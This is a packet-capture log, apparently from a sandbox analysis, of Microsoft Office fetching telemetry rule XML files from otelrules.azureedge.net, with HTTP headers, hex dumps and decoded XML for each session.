                                                                                                                                                                                                                                                                                        2024-11-11 15:37:08 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:07 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 501
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:18 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BACFDAACD"
                                                                                                                                                                                                                                                                                        x-ms-request-id: 5f7107d8-901e-0048-05d5-33b800000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153707Z-174f7845968cdxdrhC1EWRg0en0000000560000000000z2g
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:08 UTC501INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 74 61 72 74 75 70 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22
                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120682" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryStartup" /> <R T="2" R="120100" /> <SS T="3" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> </S> <C T="


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        87192.168.2.44984013.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:07 UTC192OUTGET /rules/rule120679v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:08 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:07 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 174
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582B91D80E15"
                                                                                                                                                                                                                                                                                        x-ms-request-id: 27f4d8c4-701e-0032-2dd5-33a540000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153707Z-174f78459685m244hC1EWRgp2c000000050g000000007k85
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:08 UTC174INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e
                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120679" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> </S> <T> <S T="1" /> </T></R>


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        88192.168.2.44984113.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:07 UTC192OUTGET /rules/rule120680v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:08 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:07 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 1952
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582B956B0F3D"
                                                                                                                                                                                                                                                                                        x-ms-request-id: 1c99ed40-601e-0097-39d5-33f33a000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153707Z-174f7845968v79b7hC1EWRu01s00000004t000000000anvu
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:08 UTC1952INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 31 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120680" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <SS T="1" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> <R T="2" R="120682" /> <F T="3"> <O T="LT"> <L>


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        89192.168.2.44984413.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:07 UTC193OUTGET /rules/rule120602v10s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:08 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:07 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 2592
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BB5B890DB"
                                                                                                                                                                                                                                                                                        x-ms-request-id: c08ebcb6-401e-0064-7bd5-3354af000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153707Z-174f7845968psccphC1EWRuz9s00000005dg000000008d09
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:08 UTC2592INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 32 22 20 56 3d 22 31 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 41 70 70 6c 69 63 61 74 69 6f 6e 41 6e 64 4c 61 6e 67 75 61 67 65 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d
                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120602" V="10" DC="SM" EN="Office.System.SystemHealthMetadataApplicationAndLanguage" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa=


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        90192.168.2.44984313.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:07 UTC192OUTGET /rules/rule120681v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:08 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:07 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 958
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:58 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BA0A31B3B"
                                                                                                                                                                                                                                                                                        x-ms-request-id: 7f4584eb-c01e-008e-75d5-337381000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153707Z-174f7845968px8v7hC1EWR08ng00000005a000000000npxh
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:08 UTC958INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 38 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a
                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120681" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120608" /> <R T="2" R="120680" /> <TH T="3"> <O T="AND"> <L> <O T="EQ"> <L>


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        91192.168.2.44984613.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:08 UTC192OUTGET /rules/rule120601v3s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:08 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:08 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 3342
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:34 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582B927E47E9"
                                                                                                                                                                                                                                                                                        x-ms-request-id: 99a87d01-601e-005c-42d5-33f06f000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153708Z-174f7845968qj8jrhC1EWRh41s0000000530000000009tn4
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:08 UTC3342INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 31 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 4f 53 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49
                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120601" V="3" DC="SM" EN="Office.System.SystemHealthMetadataOS" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC" xmlns=""> <RI


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        92192.168.2.44984713.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:08 UTC192OUTGET /rules/rule701201v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:08 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:08 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 1393
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:51 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BE3E55B6E"
                                                                                                                                                                                                                                                                                        x-ms-request-id: 9a2be917-a01e-0053-13d5-338603000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153708Z-174f7845968nnm4mhC1EWR1rn4000000051g00000000k98z
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:08 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22
                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml"


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        93192.168.2.44984813.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:08 UTC192OUTGET /rules/rule701200v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:08 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:08 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 1356
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BDC681E17"
                                                                                                                                                                                                                                                                                        x-ms-request-id: 1815edcd-001e-0028-0ed5-33c49f000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153708Z-174f7845968j6t2phC1EWRcfe8000000056000000000qm4m
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:08 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        94192.168.2.44985013.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:08 UTC193OUTGET /rules/rule224901v11s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:08 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:08 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 2284
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:13 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BCD58BEEE"
                                                                                                                                                                                                                                                                                        x-ms-request-id: c08ebcd4-401e-0064-18d5-3354af000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153708Z-174f7845968jrjrxhC1EWRmmrs000000059g00000000abyn
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:08 UTC2284INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 31 22 20 56 3d 22 31 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4c 69 63 65 6e 73 69 6e 67 2e 4f 66 66 69 63 65 43 6c 69 65 6e 74 4c 69 63 65 6e 73 69 6e 67 2e 44 6f 4c 69 63 65 6e 73 65 56 61 6c 69 64 61 74 69 6f 6e 22 20 41 54 54 3d 22 63 31 61 30 64 62 30 31 32 37 39 36 34 36 37 34 61 30 64 36 32 66 64 65 35 61 62 30 66 65 36 32 2d 36 65 63 34 61 63 34 35 2d 63 65 62 63 2d 34 66 38 30 2d 61 61 38 33 2d 62 36 62 39 64 33 61 38 36 65 64 37 2d 37 37 31 39 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 54 3d 22 55 70 6c 6f 61 64 2d 4d 65 64 69 75 6d 22
                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224901" V="11" DC="SM" EN="Office.Licensing.OfficeClientLicensing.DoLicenseValidation" ATT="c1a0db0127964674a0d62fde5ab0fe62-6ec4ac45-cebc-4f80-aa83-b6b9d3a86ed7-7719" SP="CriticalCensus" T="Upload-Medium"


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        95192.168.2.44984913.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:08 UTC192OUTGET /rules/rule700201v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
